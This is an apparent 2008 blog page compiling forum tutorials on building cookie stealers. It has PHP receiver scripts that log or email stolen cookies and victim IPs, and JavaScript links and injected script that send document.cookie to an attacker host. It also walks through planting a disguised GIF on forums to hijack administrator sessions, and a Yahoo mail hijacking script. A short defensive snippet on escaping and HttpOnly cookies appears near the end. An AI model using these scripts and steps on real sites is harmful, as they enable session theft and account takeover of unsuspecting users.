Friday, May 9, 2008

> How To Make And Test A Cookie Stealer, extended from Freakwolfe's Tutorial

If you are viewing this topic, you probably are having trouble getting your cookie stealer to work. If you haven't read Freakwolfe's tutorial, read that first.


Now if you've read Freakwolfe's tutorial and still need help, the code isn't the problem.


Quick Notes:
I will not be going over what each part of the code does, Freakwolfe has already done that.
I may edit, add, remove or rephrase as necessary.
I am not responsible for the use of this. Use at your own risk.


If you want your stealer to be more "unnoticeable", you might want to change the page from stealer.php to something less suspicious and noticeable, such as step2.php or continue.php - just make sure that you change every instance of stealer.php to what you renamed it to.

And the code you put in index.php can be put in any page. Just make sure that all files mentioned are in the same directory.

Javascript is used multiple times. You will need to remove the space between java and script for it to work properly. To notify you of this, there will be Javascript Alert! and Javascript Alert End in sections with the javascript code.




index.php code:


You will need to put the following code somewhere in the document, where you want the cookie stealer link to be:

Javascript Alert!
CODE
Click here!

Javascript Alert End
(You might want to change what the link says...)

stealer.php code:


Put this code in the stealer.php file in the directory you wish the cookie stealer to be in. If you already have a page that you want to include the stealer in, put it at the top of the source.

CODE
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>


___________

Now you must create a new file: cookielog.txt

Don't worry about changing the name, nobody will know about it, and you won't have to edit the stealer.php code.

Now if you want your cookie stealer to work, make sure you CHMOD your cookielog.txt file to 777 or drwxrwxrwx

That will allow the cookie stealer to write to the file so that you can capture the information.



You now should have your cookie stealer successfully set up.


Testing It Out

1. To test out your cookie stealer, open a new tab or window (so that you can follow this).

2. Type (or copy & paste) the following into the URL in that new tab or window, not the current one (i.e. the one you are reading this in) and press enter:

Javascript Alert!
CODE
java script:void(document.cookie="test=working");alert(document.cookie);

Javascript Alert End
Once you press enter, you should see an alert box that says "test=working" without quotes.


3. Now go to your site where the link is in the tab or window you entered the javascript injection (the code directly above in step 2) in.

4. Click the link. If you are brought to a blank page, that is good.

5. Download and open, or view your cookielog.txt file. You should have a line of text that says "testing=working" without quotes. If so, your cookie stealer is working! Congratz!


Common mistakes:

Forgetting to create cookielog.txt
Forgetting to change the permissions of the file to 777 (CHMOD)
Forgetting to remove the space in javascript - a space is added for security reasons in posts on this site.


_____________________________________________________

If you are still having trouble, I have created a video.

The video is located at this link. There is a link on that page (you can't miss it) to download the zip folder.

To watch the video:
Download the folder.
Extract it.
There will be one file: cookie.avi
Open cookie.avi in Windows Media Player.
Watch the video.

Some side notes:

My OS is not Vista. It's XP. I used a Vista Transformation Pack that I found on PCWorld for free to make it look and feel like Vista, without the hassles of Vista. You get the good of Vista with the good of XP.
I used CamStudio to make the video. CamStudio is freeware.

Sorry for the crappy quality - I had to make it a REALLY small file size by lowering the quality to 45% - enough to read the text but small enough to be less than 5 mb when compressed.


If you have any questions about the video, feel free to ask me or send me a PM.
_____________________________________________________


Mods, if you feel anything should be added, changed, or removed, please pm me or do it yourself.

Y! Cookie Stealer script!!

Yahoo security weakness
- cookie stealer -
Today status - Unpatched

This script can help anyone to access victim's inbox without knowing the password
Only works on IE 5x-6x and only with old Yahoo mailboxes (not with the Beta version)
==============================
The Script:
==============================

Some text here

-

==============================
Php grabber (mail sender):
==============================

<?php
$to="myemail@yahoo.com";
$subject="ID: ".$_GET["id"];
$message="ID: ".$_GET["id"]."\nCookies: \n".$_GET["cookie"]."\nIp: ".$_SERVER["REMOTE_ADDR"];
mail($to,$subject,$message, "From: cookies@lod.com");

header("Expires: Mon, 28 jun 2007 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

?>

Cookie stealer only works in Firefox not IE 6 or 7

Is the problem the part?

I used this:

(I didn't use a .gif file but a .html file)

Steal Forum Cookies With Gif
How To Steal Cookies From A Forum With A Gif And Login With Admin Privileges Without Hash Cracking !
Use Firefox Because It's The Best Browser On The Web
U Can Download The ADD N EDIT COOKIE HACK HERE:
Code:

https://addons.mozilla.org/firefox/573/

Tested On Invision Power Board 2.1.7 <- And This Xploit Works On Much Boards !

Ok Lets Start Now

Here Is Some Files U Need...

1. ) -> Copy the below code,paste in notepad or ur fav text editor and save as cookiestealer.php (Note : Save it as cookiestealer.php not cookiestealer.php.txt)

cookiestealer.php
Code:

<?php
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
    if (!$handle = fopen($filename, 'a'))
    {
        echo ".";
        exit;
    }
    else
    {
        if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
        {
            echo ".";
            exit;
        }
    }
    echo ".";
    fclose($handle);
    exit;
}
echo ".";
exit;
?>

2. ) Make a new text file and name it logfile.txt and chmod it 777 .

3. ) The malicious file fun.gif (It will redirect user to cookie stealer) .. Copy the below code and save it as fun.gif

Code:



4. ) And a real image miniature (to show to the victim)

Ok now we have 4 files as listed below :

1. ) cookiestealer.php
2. ) logfile.txt
3. ) fun.gif
4. ) And a real image (any)

lets start now ..

Upload these files to your webspace example :

fun.gif (ftp) -> www.yoursite.com/fun.gif
cookiestealer.php (ftp) -> www.yoursite.com/cookiestealer.php
logfile.txt (ftp) -> www.yoursite.com/logfile.txt


ok now go on the victim forum .. Suppose victim forum is www.victim.com/forum/index.php

Post a new topic or reply or we can insert the malicious gif in the signature ... or where we can .. but now i do a new topic with this bbcode :
PHP Code:

with this bbcode the victim doesn't see the fun.gif but the real image miniature, and when he clicks on it, he is redirected to the cookiestealer ... and we can see his cookies on :

http://yoursite.com/logfile.txt

when we have cookies we go to firefox and with the addon add n edit cookies i login with admin privileges... (first login with any user then edit cookies)

Now reload the page and you will be logged in as the administrator


Enj0y.

How To Make A Cookie Stealer?

I've explained this process several times to several different people, so I thought I'd just make one thread for it. If you have any questions or additional information, post it here.

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essence, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.


Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.


First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

CODE
<?php // line 1
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.


Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

CODE
<?php // line 1
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5
Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.


Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

HTML
<script language="JavaScript"> // Line 1
document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie; // Line 2
</script> // Line 3
Line 1 tells the browser that the following chunk of code is to be interpreted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).


There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

You can trick the victim into clicking a link which activates the sender. For example:
HTML
<a href="java script:document.location='http://www.host.com/mysite/stealer.php?cookie='+document.cookie;">Click here!</a>
(remove the space in "javascript")

Another method I discovered is putting...
HTML
<script>document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script>
...into my user-agent.



Free PHP hosts:
http://www.0php.com/free_PHP_webhosting.php
http://www.free-webhosts.com/free-php-webhosting.php


Do not ask what a cookie stealer is or how to use one; such questions have already been answered in this thread. Please read the entire thread before asking a question. If you have thoroughly read the thread and are still having difficulty, post your questions intelligently. Otherwise, I will close the thread again.
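
An added defensive example, not part of the original posts: the sender placements described above (script posted into a page, a javascript: link, markup in the User-Agent) all depend on untrusted text being rendered as markup and on the session cookie being readable from document.cookie. The sketch below shows the matching server-side controls; the function names and sample values are hypothetical.

```javascript
// Added defensive example; all names and sample values are constructed.

// Encode untrusted text (post bodies, signatures, logged User-Agent strings)
// so an embedded <script> block is displayed as text instead of executed.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Allow-list link schemes. Browsers drop tab/CR/LF anywhere in a URL and skip
// leading control characters or spaces before reading the scheme, so the same
// normalisation is applied here before checking.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
function isSafeHref(href) {
  const cleaned = String(href)
    .replace(/[\t\r\n]/g, '')
    .replace(/^[\u0000-\u0020]+/, '');
  const match = /^([a-zA-Z][a-zA-Z0-9+.-]*:)/.exec(cleaned);
  if (match) return ALLOWED_SCHEMES.has(match[1].toLowerCase());
  // No parsable scheme: accept as a relative URL only when no ':' appears
  // before the path, which also rejects spaced forms such as "java script:".
  return !/^[^/?#]*:/.test(cleaned);
}

// Render a user-supplied link; an unsafe target is replaced with "#".
function renderLink(href, label) {
  const target = isSafeHref(href) ? href : '#';
  return `<a href="${escapeHtml(target)}" rel="noopener noreferrer">${escapeHtml(label)}</a>`;
}

// Session cookie with HttpOnly: the value is not exposed through
// document.cookie, so a script that does run cannot append it to a URL.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample: a User-Agent header carrying markup, as an admin log page
// would receive it, and a user-submitted link.
const sampleUserAgent = '<script>document.location="http://collector.invalid/?c="+document.cookie</script>';
console.log(escapeHtml(sampleUserAgent));
console.log(renderLink('javascript:void(0)', 'Click here!'));
console.log(sessionCookieHeader('session_id', 'constructed-value'));
```

HttpOnly limits what a successful injection can read; it does not replace output encoding, because injected script can still act within the victim's session.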

Disclaimer :

I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!

This is a Genuine Article.

Will try to add in as much as possible
keep posting !
comment on this article !